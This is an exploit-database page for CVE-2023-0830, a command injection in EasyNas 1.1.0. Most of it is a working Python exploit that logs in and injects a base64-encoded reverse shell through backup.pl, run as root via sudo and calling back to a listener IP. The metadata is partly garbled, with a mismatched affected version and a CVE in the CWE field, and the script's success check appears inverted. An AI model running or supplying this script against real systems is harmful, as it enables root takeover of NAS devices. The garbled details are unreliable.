EasyNas 1.1.0 - OS Command Injection

vendor:

EasyNas

by:

Ivan Spiridonov

8.8

CVSS

HIGH

OS Command Injection

CWE

Product Name: EasyNas

Affected Version From: 1.1.2000

Affected Version To: 1.1.2000

Patch Exists: YES

Related CWE: CVE-2023-0830

CPE: a:easynas:easynas:1.1.0

Metasploit:

Platforms Tested:

2023

EasyNas 1.1.0 – OS Command Injection

EasyNas 1.1.0 is vulnerable to OS Command Injection. An attacker can exploit this vulnerability by sending a malicious payload to the backup.pl page. The payload is then executed with root privileges, allowing the attacker to gain access to the system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in system commands.

Source

Exploit-DB raw data:

# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830

#!/usr/bin/python3

import requests
import sys
import base64
import urllib.parse
import time

from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])

# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()

# URL encode the payload
payload = urllib.parse.quote(payload)

# Create the login data
login_data = {
    'usr':user,
    'pwd':password,
    'action':'login'
}

# Create a session
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)

# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    sys.exit()
else:
    print("Login successful")


# send the exploit request
timeout = 3

try:
    exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")

except requests.exceptions.ReadTimeout:
    print("[-] Everything seems ok, check your listener.")
    sys.exit()